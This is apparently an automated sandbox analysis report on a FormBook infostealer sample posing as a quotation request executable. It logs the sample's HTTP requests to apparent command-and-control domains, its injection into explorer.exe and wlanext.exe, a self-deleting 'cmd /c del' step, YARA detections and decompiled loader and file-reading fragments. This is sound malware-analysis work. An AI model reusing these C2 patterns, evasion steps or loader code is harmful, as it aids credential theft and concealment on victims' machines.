71 59 45 67 52 36 31 4c 6c 30 63 50 32 6a 46 43 61 51 44 57 43 6d 4b 44 63 36 33 65 37 5a 68 26 61 6d 70 3b 75 54 67 4c 3d 4d 36 41 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49754	46.30.211.38	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:52:15.430581093 CEST	9273	OUT	GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1 Host: www.graet.design Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:52:15.504179001 CEST	9274	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 03 May 2021 14:52:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 162 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: QUOTATION REQUEST.exe PID: 4660 Parent PID: 5672

General

Start time:	16:50:14
Start date:	03/05/2021
Path:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Imagebase:	0x230000
File size:	745984 bytes
MD5 hash:	64AF41000584694858D0FCC37B1BF69B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: QUOTATION REQUEST.exe PID: 4112 Parent PID: 4660

General

Start time:	16:50:18
Start date:	03/05/2021
Path:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
Imagebase:	0xc40000
File size:	745984 bytes
MD5 hash:	64AF41000584694858D0FCC37B1BF69B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 4112

General

Start time:	16:50:21
Start date:	03/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wlanext.exe PID: 5268 Parent PID: 3388

General

Start time:	16:50:35
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x1260000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5784 Parent PID: 5268

General

Start time:	16:50:40
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Imagebase:	0xbc0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5564 Parent PID: 5784

General

Start time:	16:50:41
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: QUOTATION REQUEST.exe PID: 4660 Parent PID: 5672 QUOTATION REQUEST.exeCOMMON

Executed Functions

Function 04C1C900, Relevance: 3.3, Instructions: 3314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.232966509.0000000004C10000.00000040.00000001.sdmp, Offset: 04C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1c6fca4d4fe9d6c15942fb3137180d67022069e6448947f79020b9af7174f4
Instruction ID: 2827d972229305ed02e7ef2bfeedbd28fe735def11f22d5f7ee727bfeb3280c1
Opcode Fuzzy Hash: 8f1c6fca4d4fe9d6c15942fb3137180d67022069e6448947f79020b9af7174f4
Instruction Fuzzy Hash: F8730B74A00219CFCB24DF68C898A9DB7B2BF89314F158599E91A9B361DB30FD81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C194A8, Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e77ed6ff730fab88febc266b2a76edd6266087a8a9f23b3a3367d413edf8f2b
Instruction ID: 0773af5f5a8e13055bc1e2c91559549f9bb83bc370b76f40e191f801ac287933
Opcode Fuzzy Hash: 6e77ed6ff730fab88febc266b2a76edd6266087a8a9f23b3a3367d413edf8f2b
Instruction Fuzzy Hash: B652AE31A00619CFDB14DF54C890AEEB7B2FF46304F5584A9E91AAB251D730FE86DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C1BA50, Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C1BCA6

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ae82f6a717f54968ab85ad827a9142ecfe22980aa7bbe864c293a8c348a7611
Instruction ID: de2a9b30af727e6179da90cf4869f510d509f0d2a0e69bfb5633222fad4a8391
Opcode Fuzzy Hash: 2ae82f6a717f54968ab85ad827a9142ecfe22980aa7bbe864c293a8c348a7611
Instruction Fuzzy Hash: 5C815670A00B058FDB24DF2AD45179ABBF1FF89314F10892DE49ADBA40D734E9869F91

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AAB8, Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf8b1da0415506e4d42f34092916ba377bcee825ade78f22a0c062ef77e1f32
Instruction ID: e99c7344b96fcee3cb90de8abb39bec176119a1221b6532689eb480a9cf7448d
Opcode Fuzzy Hash: faf8b1da0415506e4d42f34092916ba377bcee825ade78f22a0c062ef77e1f32
Instruction Fuzzy Hash: 6F5111B1C00308DFDF15CFA9D880ADEBBB1BF49314F24812AE815AB211D774A986DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AAD4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C1E02A

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e0303cf1bc2a4253ff6ebca695d0753fd2c65ec8b4c15aecf3b72079039fa88a
Instruction ID: ae079ec2f6def67b26392bbab350ff26f2533c29bc84c844f8681f246efdbdb4
Opcode Fuzzy Hash: e0303cf1bc2a4253ff6ebca695d0753fd2c65ec8b4c15aecf3b72079039fa88a
Instruction Fuzzy Hash: 3451D1B1D10309DFDF14CF9AC884ADEBBB5BF48314F64812AE819AB210D774A985DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C1DF0D, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C1E02A

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 67e574ff28b1904d09291fd5313db8d7a331ab0b0c284ae1e0bab2b5a45cd1f8
Instruction ID: 193564dc280e1586411403275275d67c4571ec06e0d4e2dd1246e1ee68768cea
Opcode Fuzzy Hash: 67e574ff28b1904d09291fd5313db8d7a331ab0b0c284ae1e0bab2b5a45cd1f8
Instruction Fuzzy Hash: 6F51C0B1D10308DFDF14CFA9D884ADEBBB1BF48314F64812AE819AB210D7749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C17009, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C17107

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 293da993e167ce7b7b23a9d4984d6824896e1f66f8be63e52a461050a601a57c
Instruction ID: e0b1f2a5411390ebafbd6a151cda13a36afbc040aec46fd2f0bab16702efdf8d
Opcode Fuzzy Hash: 293da993e167ce7b7b23a9d4984d6824896e1f66f8be63e52a461050a601a57c
Instruction Fuzzy Hash: 86418876900248AFCF01CFA9D844ADEBFF9EB89320F14805AF944A7221C334A955DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04C12354, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04C13DF1

Memory Dump Source

Source File: 00000000.00000002.232966509.0000000004C10000.00000040.00000001.sdmp, Offset: 04C10000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 91e33b060b82706129d15c8bd6fefd9a919151b9abae33fbaf6e3a9ce61a940a
Instruction ID: aef3bfc2f543f79ac245d88c71a14074469abe55cee3234347bd64f5112a1bf7
Opcode Fuzzy Hash: 91e33b060b82706129d15c8bd6fefd9a919151b9abae33fbaf6e3a9ce61a940a
Instruction Fuzzy Hash: 4541F570D0475CCFEB24DFA9C88479EBBB6BF49308F208059D409AB261DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04C10CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04C10D91

Memory Dump Source

Source File: 00000000.00000002.232966509.0000000004C10000.00000040.00000001.sdmp, Offset: 04C10000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b773afd13b039d62239970c0afadb12fc48152c095ab4b5f0b57a2213317b837
Instruction ID: 2ce715a922f5f600a8a5a801e1768dbcb108e58af819f7615c5e9dd37bbfa8fe
Opcode Fuzzy Hash: b773afd13b039d62239970c0afadb12fc48152c095ab4b5f0b57a2213317b837
Instruction Fuzzy Hash: 7A415BB4A00204CFCB14DF9AC448AAABBF5FF89314F25C449E419AB721D334B845DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C17078, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C17107

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 95b2d0d943e5fcfae0b718fd12851c2473e533d7c5d2b505288465174d3cd0b1
Instruction ID: 2a49b6a7cea7e0da39f208f0dda7c0eeeb8371d0a8b8484a865cc7d5bafbf104
Opcode Fuzzy Hash: 95b2d0d943e5fcfae0b718fd12851c2473e533d7c5d2b505288465174d3cd0b1
Instruction Fuzzy Hash: 242114B5900208EFDF10CFA9D884ADEBBF4FB48324F14801AE918A7310D374A955DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C17080, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C17107

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d7eaee58727902e2b595f5c124e6b8c00c62a26ffeaa43d29c1827bf2e33a9b7
Instruction ID: 59e12fb9e7e22e1580b42b452cf692379915b6320ad01b6683686b1f897b0895
Opcode Fuzzy Hash: d7eaee58727902e2b595f5c124e6b8c00c62a26ffeaa43d29c1827bf2e33a9b7
Instruction Fuzzy Hash: 5721F8B5900208EFDF10CFA9D884ADEBBF4FB48324F14841AE914A7310D374A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A998, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1BD21,00000800,00000000,00000000), ref: 00C1BF32

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1aedd6fde756a572f79a7c81c80e3e2234d63fe69065504922a02a6645d1aa5a
Instruction ID: 2c35a8c935013d25405fab99efd9a53c0b381789ec401ef198d8275e380a3a35
Opcode Fuzzy Hash: 1aedd6fde756a572f79a7c81c80e3e2234d63fe69065504922a02a6645d1aa5a
Instruction Fuzzy Hash: F21114B69002089FCB10DFAAC844ADFFBF4EB49324F50842AE519A7200C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C1BEC0, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1BD21,00000800,00000000,00000000), ref: 00C1BF32

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 41ed0f1a5c4f7e0d8602f0e1395f4d6130d0ebed2872de6dec18c45cbc96288e
Instruction ID: 745b34456326c4597f38d104577f81e29b8d49e0cf55d20db49bc4f1c5b07404
Opcode Fuzzy Hash: 41ed0f1a5c4f7e0d8602f0e1395f4d6130d0ebed2872de6dec18c45cbc96288e
Instruction Fuzzy Hash: 471129B69002098FCF10DFAAD844ADEFBF4EB48324F15851AE419A7300C375A94ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C1BC40, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C1BCA6

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b745893fc368d05a1193f96605dd2992975b3bc0abd1261f1133d0df653d0b70
Instruction ID: 165fd7c3e9ce9b3aa4e58008ca9a14f17caf713b3552c4b43334bb1a959c818a
Opcode Fuzzy Hash: b745893fc368d05a1193f96605dd2992975b3bc0abd1261f1133d0df653d0b70
Instruction Fuzzy Hash: 931113B1D002098FCB10DFAAC444BDFFBF4AB89324F10841AD829B7600D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C1E159, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00C1E1BD

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 696cfd23d52d908b5e356d4fe7b771cfc6b289c4f3c4f7bc2d5ca7359d3b6bce
Instruction ID: 3771bc1028d91477eaa4100008bb2719d9275bd874d1536c849854dd77f28745
Opcode Fuzzy Hash: 696cfd23d52d908b5e356d4fe7b771cfc6b289c4f3c4f7bc2d5ca7359d3b6bce
Instruction Fuzzy Hash: 3F1106B5900208DFDB10DF99D584BDFBBF4EB48324F24845AD855A7740C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C1E160, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00C1E1BD

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: cc773f7b3296b662f714e496a782159b602ed6f0f7b526c4f3a87904e052dab7
Instruction ID: 820d41937933bbd68a6b22585e1eb6ffd0192e81bf900d34511b0402175c383e
Opcode Fuzzy Hash: cc773f7b3296b662f714e496a782159b602ed6f0f7b526c4f3a87904e052dab7
Instruction Fuzzy Hash: DC11E5B59002099FDB10DF99D888BDFBBF8EB48324F20841AE955A7741C375A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C1A758, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e30c8fd8775bde87a385dcd8d9a74c21accbff3cacfd1bbd556abead3648fd
Instruction ID: dcefb62e091e372f29efca46a3dbe4771b95b1aca7c48d67c218c109e130c43b
Opcode Fuzzy Hash: b1e30c8fd8775bde87a385dcd8d9a74c21accbff3cacfd1bbd556abead3648fd
Instruction Fuzzy Hash: 3DA17132E002198FCF05DFA5C8445DEBBB2FF86300B15856AE915AB261EB359D59DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C3A0, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.228021145.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed45429c1066d4ad0c7aacbf2396c3063dc0922d5013849f58b424a6f02f75e
Instruction ID: 128f6e202e27dd0779eb05727218c18e79dadbc3c5bc73925279215db0441ba6
Opcode Fuzzy Hash: 8ed45429c1066d4ad0c7aacbf2396c3063dc0922d5013849f58b424a6f02f75e
Instruction Fuzzy Hash: 6AC15BF1C917468BD72CDF66E88A1897B71BB84328FD24B08D1616BAD0D7B4106ECF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: QUOTATION REQUEST.exe PID: 4112 Parent PID: 4660 QUOTATION REQUEST.exeCOMMON

Executed Functions

Function 004182BA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: ecd80da55bfbc40a4bdeb6817b29a0672beb0a732750030af6f9242e9ea8ad5c
Instruction ID: 89bb97a9a17f5cc293ae42172dadf314d641a7a44f4e9fe305d2727a21d3df75
Opcode Fuzzy Hash: ecd80da55bfbc40a4bdeb6817b29a0672beb0a732750030af6f9242e9ea8ad5c
Instruction Fuzzy Hash: A7114876200208AFCB14DF99DC81EEB77A9EF9C354F15869DFA0D97241CA30E910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E00418DC0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

